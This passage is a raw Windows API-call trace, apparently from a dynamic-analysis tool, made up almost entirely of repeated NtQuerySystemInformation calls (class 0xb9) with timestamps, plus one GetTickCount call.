[0182.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x20, ResultLength=0x0) [0182.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x20, ResultLength=0x0) [0182.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x38, ResultLength=0x0) [0182.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x20, ResultLength=0x0) [0182.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0182.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0182.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0182.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0182.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0182.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1b0, Length=0x38, ResultLength=0x0) [0182.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x28, ResultLength=0x0) [0182.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff008, Length=0x50, ResultLength=0x0) [0182.098] GetTickCount () returned 0x116e353 [0182.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed8, Length=0x58, ResultLength=0x0) [0182.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedf0, Length=0x38, ResultLength=0x0) [0182.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec20, Length=0x28, ResultLength=0x0) [0182.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec20, Length=0x28, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec20, Length=0x28, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec20, Length=0x28, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedf0, Length=0x38, ResultLength=0x0) [0182.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x28, ResultLength=0x0) [0182.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x28, ResultLength=0x0) [0182.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedf0, Length=0x38, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x20, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x20, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x20, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedf0, Length=0x38, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0182.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec00, Length=0x20, ResultLength=0x0) [0182.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec00, Length=0x20, ResultLength=0x0) [0182.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed8, Length=0x58, ResultLength=0x0) [0182.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x38, ResultLength=0x0) [0182.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x28, ResultLength=0x0) [0182.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x28, ResultLength=0x0) [0182.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x28, ResultLength=0x0) [0182.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x28, ResultLength=0x0) [0182.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x28, ResultLength=0x0) [0182.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x38, ResultLength=0x0) [0182.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x38, ResultLength=0x0) [0182.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x28, ResultLength=0x0) [0182.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x28, ResultLength=0x0) [0182.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x38, ResultLength=0x0) [0182.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x38, ResultLength=0x0) [0182.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x20, ResultLength=0x0) [0182.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0182.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x20, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x38, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec40, Length=0x20, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0182.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x38, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec40, Length=0x20, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x38, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec40, Length=0x20, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febd0, Length=0x20, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febd0, Length=0x20, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed8, Length=0x58, ResultLength=0x0) [0182.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feda0, Length=0x58, ResultLength=0x0) [0182.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0182.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0182.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0182.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0182.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0182.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x28, ResultLength=0x0) [0182.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0182.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0182.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0182.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0182.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0182.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0182.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0182.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feda0, Length=0x58, ResultLength=0x0) [0182.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0182.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0182.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0182.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0182.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0182.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0182.354] 